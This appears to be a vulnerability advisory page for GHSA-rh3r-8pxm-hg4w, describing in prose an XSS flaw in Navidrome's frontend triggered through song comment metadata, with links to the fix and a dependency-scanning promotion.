GHSA-rh3r-8pxm-hg4w: Navidrome has XSS via comment from song metadata

February 4, 2026

An XSS vulnerability in the frontend allows a malicious attacker to inject code through the comment metadata of a song to exfiltrate user credentials.

An attacker’s maliciously crafted song has to be added to Navidrome to exploit the vulnerability.

References

github.com/advisories/GHSA-rh3r-8pxm-hg4w
github.com/navidrome/navidrome
github.com/navidrome/navidrome/commit/d7ec7355c9036d5be659d6ac555c334bb5848ba6
github.com/navidrome/navidrome/releases/tag/v0.60.0
github.com/navidrome/navidrome/security/advisories/GHSA-rh3r-8pxm-hg4w

Code Behaviors & Features

Detect and mitigate GHSA-rh3r-8pxm-hg4w with GitLab Dependency Scanning

Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →